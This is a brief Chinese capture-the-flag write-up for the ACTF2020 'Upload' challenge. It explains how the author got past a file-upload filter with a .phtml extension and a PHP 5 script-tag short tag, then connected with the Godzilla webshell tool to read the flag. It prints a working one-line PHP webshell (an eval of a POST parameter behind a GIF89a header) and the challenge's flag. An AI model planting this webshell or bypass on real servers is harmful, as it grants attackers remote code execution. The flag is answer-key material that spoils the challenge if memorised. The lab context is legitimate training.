[ACTF2020 新生赛]Upload
先写一个万能的一句话木马
- 使用一句话木马
- 发现这个是有内容过滤的 过滤了 <?
-
-
- 发现这个过滤的很死
- 那就只能使用 不带 ? 的短标签了 使用script 标签 这个的使用只限于对方的php是5版本的
- 正好是低版本的
- 所以直接上传 改一下后缀为 phtml
- 成功上传 但是我们没有找到具体的上传地址 :1、目录扫描 2、猜一下是不是 upload 目录
- 发现猜对了
- 哥斯拉链接
- 找一下flag
- flag{537f95ae-87a4-43f4-973a-1492ae8a92af}
- 知识点 : 1、php 后缀的绕过 : phtml
- 2、 php短标签的绕过(只有php版本为5开头的才行) :
- GIF89a // 这个是万能标签 防止 MIME 检查文件头
- <script language="php">
- eval($_POST['pass']);
- </script>